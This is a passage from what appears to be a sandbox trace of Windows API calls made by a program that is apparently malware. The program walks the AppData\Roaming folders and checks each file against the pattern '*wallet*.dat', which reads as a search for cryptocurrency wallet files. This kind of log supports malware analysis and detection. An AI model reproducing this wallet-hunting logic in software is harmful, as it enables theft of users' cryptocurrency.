lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a33c7f0, ftCreationTime.dwHighDateTime=0x1d8a60a, ftLastAccessTime.dwLowDateTime=0x49671fc0, ftLastAccessTime.dwHighDateTime=0x1d8a671, ftLastWriteTime.dwLowDateTime=0x49671fc0, ftLastWriteTime.dwHighDateTime=0x1d8a671, nFileSizeHigh=0x0, nFileSizeLow=0x16ec1, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="5prTOmnPgTwgG.flv", cAlternateFileName="5PRTOM~1.FLV")) returned 1 [0175.055] StrCmpCA (pszStr1="5prTOmnPgTwgG.flv", pszStr2=".") returned 7 [0175.055] StrCmpCA (pszStr1="5prTOmnPgTwgG.flv", pszStr2="..") returned 7 [0175.055] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5prTOmnPgTwgG.flv") returned 55 [0175.055] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.055] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="5prTOmnPgTwgG.flv") returned 17 [0175.055] PathMatchSpecA (pszFile="5prTOmnPgTwgG.flv", pszSpec="*wallet*.dat") returned 0 [0175.055] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5prTOmnPgTwgG.flv\\*") returned 57 [0175.055] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5prTOmnPgTwgG.flv\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5prtomnpgtwgg.flv\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x2a33c7f0, ftCreationTime.dwLowDateTime=0x1d8a60a, ftCreationTime.dwHighDateTime=0x49671fc0, ftLastAccessTime.dwLowDateTime=0x1d8a671, ftLastAccessTime.dwHighDateTime=0x49671fc0, ftLastWriteTime.dwLowDateTime=0x1d8a671, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x16ec1, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x700035, cFileName="r", cAlternateFileName="")) returned 0xffffffff [0175.055] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc27cd50, ftCreationTime.dwHighDateTime=0x1d89bc4, ftLastAccessTime.dwLowDateTime=0xc333cb40, ftLastAccessTime.dwHighDateTime=0x1d8a3b1, ftLastWriteTime.dwLowDateTime=0xc333cb40, ftLastWriteTime.dwHighDateTime=0x1d8a3b1, nFileSizeHigh=0x0, nFileSizeLow=0x5fc4, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="5RwoDPS8u2I3lhJ.gif", cAlternateFileName="5RWODP~1.GIF")) returned 1 [0175.056] StrCmpCA (pszStr1="5RwoDPS8u2I3lhJ.gif", pszStr2=".") returned 7 [0175.056] StrCmpCA (pszStr1="5RwoDPS8u2I3lhJ.gif", pszStr2="..") returned 7 [0175.056] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5RwoDPS8u2I3lhJ.gif") returned 57 [0175.056] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.056] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="5RwoDPS8u2I3lhJ.gif") returned 19 [0175.056] PathMatchSpecA (pszFile="5RwoDPS8u2I3lhJ.gif", pszSpec="*wallet*.dat") returned 0 [0175.056] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5RwoDPS8u2I3lhJ.gif\\*") returned 59 [0175.056] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5RwoDPS8u2I3lhJ.gif\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5rwodps8u2i3lhj.gif\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xbc27cd50, ftCreationTime.dwLowDateTime=0x1d89bc4, ftCreationTime.dwHighDateTime=0xc333cb40, ftLastAccessTime.dwLowDateTime=0x1d8a3b1, ftLastAccessTime.dwHighDateTime=0xc333cb40, ftLastWriteTime.dwLowDateTime=0x1d8a3b1, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x5fc4, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x520035, cFileName="w", cAlternateFileName="")) returned 0xffffffff [0175.056] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe711c2f0, ftCreationTime.dwHighDateTime=0x1d89aa2, ftLastAccessTime.dwLowDateTime=0xdea32690, ftLastAccessTime.dwHighDateTime=0x1d89ed0, ftLastWriteTime.dwLowDateTime=0xdea32690, ftLastWriteTime.dwHighDateTime=0x1d89ed0, nFileSizeHigh=0x0, nFileSizeLow=0xe84, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="6KegzxkWRW4yhuo6bOB.swf", cAlternateFileName="6KEGZX~1.SWF")) returned 1 [0175.056] StrCmpCA (pszStr1="6KegzxkWRW4yhuo6bOB.swf", pszStr2=".") returned 8 [0175.056] StrCmpCA (pszStr1="6KegzxkWRW4yhuo6bOB.swf", pszStr2="..") returned 8 [0175.056] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6KegzxkWRW4yhuo6bOB.swf") returned 61 [0175.056] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.056] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="6KegzxkWRW4yhuo6bOB.swf") returned 23 [0175.056] PathMatchSpecA (pszFile="6KegzxkWRW4yhuo6bOB.swf", pszSpec="*wallet*.dat") returned 0 [0175.056] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6KegzxkWRW4yhuo6bOB.swf\\*") returned 63 [0175.056] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\6KegzxkWRW4yhuo6bOB.swf\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\6kegzxkwrw4yhuo6bob.swf\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xe711c2f0, ftCreationTime.dwLowDateTime=0x1d89aa2, ftCreationTime.dwHighDateTime=0xdea32690, ftLastAccessTime.dwLowDateTime=0x1d89ed0, ftLastAccessTime.dwHighDateTime=0xdea32690, ftLastWriteTime.dwLowDateTime=0x1d89ed0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xe84, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x4b0036, cFileName="e", cAlternateFileName="")) returned 0xffffffff [0175.056] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc02e85a0, ftCreationTime.dwHighDateTime=0x1d89a5d, ftLastAccessTime.dwLowDateTime=0xa76a1b80, ftLastAccessTime.dwHighDateTime=0x1d8a41f, ftLastWriteTime.dwLowDateTime=0xa76a1b80, ftLastWriteTime.dwHighDateTime=0x1d8a41f, nFileSizeHigh=0x0, nFileSizeLow=0xb5fc, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="8pd Wpqu2HmBfqqO.swf", cAlternateFileName="8PDWPQ~1.SWF")) returned 1 [0175.056] StrCmpCA (pszStr1="8pd Wpqu2HmBfqqO.swf", pszStr2=".") returned 10 [0175.056] StrCmpCA (pszStr1="8pd Wpqu2HmBfqqO.swf", pszStr2="..") returned 10 [0175.056] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pd Wpqu2HmBfqqO.swf") returned 58 [0175.056] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.056] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="8pd Wpqu2HmBfqqO.swf") returned 20 [0175.056] PathMatchSpecA (pszFile="8pd Wpqu2HmBfqqO.swf", pszSpec="*wallet*.dat") returned 0 [0175.056] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pd Wpqu2HmBfqqO.swf\\*") returned 60 [0175.056] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\8pd Wpqu2HmBfqqO.swf\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\8pd wpqu2hmbfqqo.swf\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xc02e85a0, ftCreationTime.dwLowDateTime=0x1d89a5d, ftCreationTime.dwHighDateTime=0xa76a1b80, ftLastAccessTime.dwLowDateTime=0x1d8a41f, ftLastAccessTime.dwHighDateTime=0xa76a1b80, ftLastWriteTime.dwLowDateTime=0x1d8a41f, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xb5fc, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x700038, cFileName="d", cAlternateFileName="")) returned 0xffffffff [0175.057] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="Adobe", cAlternateFileName="")) returned 1 [0175.057] StrCmpCA (pszStr1="Adobe", pszStr2=".") returned 19 [0175.057] StrCmpCA (pszStr1="Adobe", pszStr2="..") returned 19 [0175.057] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe") returned 43 [0175.057] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.057] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="Adobe") returned 5 [0175.057] PathMatchSpecA (pszFile="Adobe", pszSpec="*wallet*.dat") returned 0 [0175.057] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*") returned 45 [0175.057] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x4eae10 [0175.058] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.058] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0175.058] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.059] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.059] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x1, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0175.059] StrCmpCA (pszStr1="Flash Player", pszStr2=".") returned 24 [0175.059] StrCmpCA (pszStr1="Flash Player", pszStr2="..") returned 24 [0175.059] wsprintfA (in: param_1=0x197bf4, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player") returned 56 [0175.059] StrCmpCA (pszStr1="Adobe", pszStr2="") returned 65 [0175.059] wsprintfA (in: param_1=0x197cfc, param_2="%s\\%s" | out: param_1="Adobe\\Flash Player") returned 18 [0175.059] PathMatchSpecA (pszFile="Flash Player", pszSpec="*wallet*.dat") returned 0 [0175.059] wsprintfA (in: param_1=0x1978c4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned 58 [0175.059] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player\\*"), lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197478, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x4eb090 [0175.059] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.059] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197478, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0175.059] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.060] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.060] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197478, dwReserved1=0x1, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0175.060] StrCmpCA (pszStr1="NativeCache", pszStr2=".") returned 32 [0175.060] StrCmpCA (pszStr1="NativeCache", pszStr2="..") returned 32 [0175.060] wsprintfA (in: param_1=0x19756c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned 68 [0175.060] StrCmpCA (pszStr1="Adobe\\Flash Player", pszStr2="") returned 65 [0175.060] wsprintfA (in: param_1=0x197674, param_2="%s\\%s" | out: param_1="Adobe\\Flash Player\\NativeCache") returned 30 [0175.060] PathMatchSpecA (pszFile="NativeCache", pszSpec="*wallet*.dat") returned 0 [0175.060] wsprintfA (in: param_1=0x19723c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned 70 [0175.060] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player\\nativecache\\*"), lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x4eb1d0 [0175.060] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.060] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0175.060] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.060] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.060] FindNextFileA (in: hFindFile=0x4eb1d0, lpFindFileData=0x1970f4 | out: lpFindFileData=0x1970f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 0 [0175.060] FindClose (in: hFindFile=0x4eb1d0 | out: hFindFile=0x4eb1d0) returned 1 [0175.060] FindNextFileA (in: hFindFile=0x4eb090, lpFindFileData=0x19777c | out: lpFindFileData=0x19777c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197478, dwReserved1=0x1, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0175.060] FindClose (in: hFindFile=0x4eb090 | out: hFindFile=0x4eb090) returned 1 [0175.061] FindNextFileA (in: hFindFile=0x4eae10, lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x1, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0175.061] FindClose (in: hFindFile=0x4eae10 | out: hFindFile=0x4eae10) returned 1 [0175.061] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x1a16bf4b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a16bf4b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a16bf4b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2d800, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="bcatcih", cAlternateFileName="")) returned 1 [0175.061] StrCmpCA (pszStr1="bcatcih", pszStr2=".") returned 52 [0175.061] StrCmpCA (pszStr1="bcatcih", pszStr2="..") returned 52 [0175.061] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 45 [0175.061] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.061] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="bcatcih") returned 7 [0175.061] PathMatchSpecA (pszFile="bcatcih", pszSpec="*wallet*.dat") returned 0 [0175.061] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih\\*") returned 47 [0175.061] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x1a16bf4b, ftCreationTime.dwLowDateTime=0x1d112e3, ftCreationTime.dwHighDateTime=0x1a16bf4b, ftLastAccessTime.dwLowDateTime=0x1d112e3, ftLastAccessTime.dwHighDateTime=0x1a16bf4b, ftLastWriteTime.dwLowDateTime=0x1d112e3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2d800, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x630062, cFileName="a", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.061] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9d03d0, ftCreationTime.dwHighDateTime=0x1d8a39a, ftLastAccessTime.dwLowDateTime=0xb2963260, ftLastAccessTime.dwHighDateTime=0x1d8a711, ftLastWriteTime.dwLowDateTime=0xb2963260, ftLastWriteTime.dwHighDateTime=0x1d8a711, nFileSizeHigh=0x0, nFileSizeLow=0x155d7, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="bhYV-wEZC.png", cAlternateFileName="BHYV-W~1.PNG")) returned 1 [0175.061] StrCmpCA (pszStr1="bhYV-wEZC.png", pszStr2=".") returned 52 [0175.061] StrCmpCA (pszStr1="bhYV-wEZC.png", pszStr2="..") returned 52 [0175.061] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bhYV-wEZC.png") returned 51 [0175.061] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.061] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="bhYV-wEZC.png") returned 13 [0175.061] PathMatchSpecA (pszFile="bhYV-wEZC.png", pszSpec="*wallet*.dat") returned 0 [0175.061] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bhYV-wEZC.png\\*") returned 53 [0175.061] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bhYV-wEZC.png\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bhyv-wezc.png\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xdf9d03d0, ftCreationTime.dwLowDateTime=0x1d8a39a, ftCreationTime.dwHighDateTime=0xb2963260, ftLastAccessTime.dwLowDateTime=0x1d8a711, ftLastAccessTime.dwHighDateTime=0xb2963260, ftLastWriteTime.dwLowDateTime=0x1d8a711, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x155d7, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x680062, cFileName="Y", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.061] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7751e30, ftCreationTime.dwHighDateTime=0x1d897cd, ftLastAccessTime.dwLowDateTime=0x68bce450, ftLastAccessTime.dwHighDateTime=0x1d89afe, ftLastWriteTime.dwLowDateTime=0x68bce450, ftLastWriteTime.dwHighDateTime=0x1d89afe, nFileSizeHigh=0x0, nFileSizeLow=0x73c6, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="DKhG.gif", cAlternateFileName="")) returned 1 [0175.061] StrCmpCA (pszStr1="DKhG.gif", pszStr2=".") returned 22 [0175.061] StrCmpCA (pszStr1="DKhG.gif", pszStr2="..") returned 22 [0175.061] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DKhG.gif") returned 46 [0175.061] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.062] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="DKhG.gif") returned 8 [0175.062] PathMatchSpecA (pszFile="DKhG.gif", pszSpec="*wallet*.dat") returned 0 [0175.062] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DKhG.gif\\*") returned 48 [0175.062] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DKhG.gif\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\dkhg.gif\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0xa7751e30, ftCreationTime.dwLowDateTime=0x1d897cd, ftCreationTime.dwHighDateTime=0x68bce450, ftLastAccessTime.dwLowDateTime=0x1d89afe, ftLastAccessTime.dwHighDateTime=0x68bce450, ftLastWriteTime.dwLowDateTime=0x1d89afe, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x73c6, nFileSizeLow=0x0, dwReserved0=0x197b00, dwReserved1=0x4b0044, cFileName="h", cAlternateFileName="FLASHP~1Ð\x07\x02")) returned 0xffffffff [0175.062] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x164af860, ftCreationTime.dwHighDateTime=0x1d899d7, ftLastAccessTime.dwLowDateTime=0xe57d8e70, ftLastAccessTime.dwHighDateTime=0x1d8a131, ftLastWriteTime.dwLowDateTime=0xe57d8e70, ftLastWriteTime.dwHighDateTime=0x1d8a131, nFileSizeHigh=0x0, nFileSizeLow=0x38a3, dwReserved0=0x0, dwReserved1=0x197b00, cFileName="ElKJGaG.avi", cAlternateFileName="")) returned 1 [0175.062] StrCmpCA (pszStr1="ElKJGaG.avi", pszStr2=".") returned 23 [0175.062] StrCmpCA (pszStr1="ElKJGaG.avi", pszStr2="..") returned 23 [0175.062] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElKJGaG.avi") returned 49 [0175.062] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.062] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="ElKJGaG.avi") returned 11 [0175.062] PathMatchSpecA (pszFile="ElKJGaG.avi", pszSpec="*wallet*.dat") returned 0 [0175.062] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElKJGaG.avi\\*") returned 51 [0175.062] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElKJGaG.avi\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\elkjgag.avi\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x164af860, ftCreationTime.dwLowDateTime=0x1d899d7, ftCreationTime.dwHighDateTime=0xe57d8e70, ftLastAccessTime.dwLowDateTime=0x1d8a131, ftLastAccessTime.dwHighDateTime=0xe57d8e70, 